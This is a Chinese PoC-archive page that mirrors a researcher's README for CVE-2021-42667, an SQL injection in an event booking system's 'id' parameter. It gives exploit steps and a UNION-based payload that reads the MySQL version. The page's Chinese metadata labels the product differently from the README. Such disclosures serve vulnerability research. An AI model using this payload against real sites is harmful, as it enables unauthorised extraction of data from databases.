目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2021-42667 PoC — Engineers Online Portal SQL注入漏洞

来源
https://github.com/0xDeku/CVE-2021-42667
关联漏洞
标题:Engineers Online Portal SQL注入漏洞 (CVE-2021-42667)
Description:Engineers Online Portal是开源的一个在线门户。是使用PHP、MySQL 数据库、HTML、CSS、Javascript、jQuery、Ajax、Bootstrap 和一些其他库开发的。 Engineers Online Portal 存在SQL注入漏洞,该漏洞源于事件管理视图中,PHP的Sourcecodester在线事件预订和预订系统存在SQL注入漏洞。攻击者可利用该漏洞来操纵所执行的sql查询,因此他可以从web服务器提取敏感数据以便在远程web服务器上执行远程代码。
Description
CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system.
介绍
# CVE-2021-42667
CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system version 2.3.0.

# Technical description:
An SQL Injection vulnerability exists in the Event management software version 2.3.0. An attacker can leverage the vulnerable "id" parameter in the "USER" web page in order to manipulate the sql query performed.
As a result the attacker can extract sensitive data from the web server.

Vulnerable page - USER

Vulnerable parameter - "id"

# Steps to exploit:
1) Navigate to http://localhost/event-management/views/?v=USER&ID=1
2) Insert your payload in the id parameter

# Proof of concept (Poc) -
The following payload will allow you to extract the MySql server version running on the web server -
```
UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL;-- -
```

![CVE-2021-42667](https://user-images.githubusercontent.com/93016131/140189245-95231b03-fb92-419e-922c-74c8752e775f.gif)

# References - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42667

https://nvd.nist.gov/vuln/detail/CVE-2021-42667

# Discovered by - 
Alon Leviev(0xDeku), 22 October, 2021.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →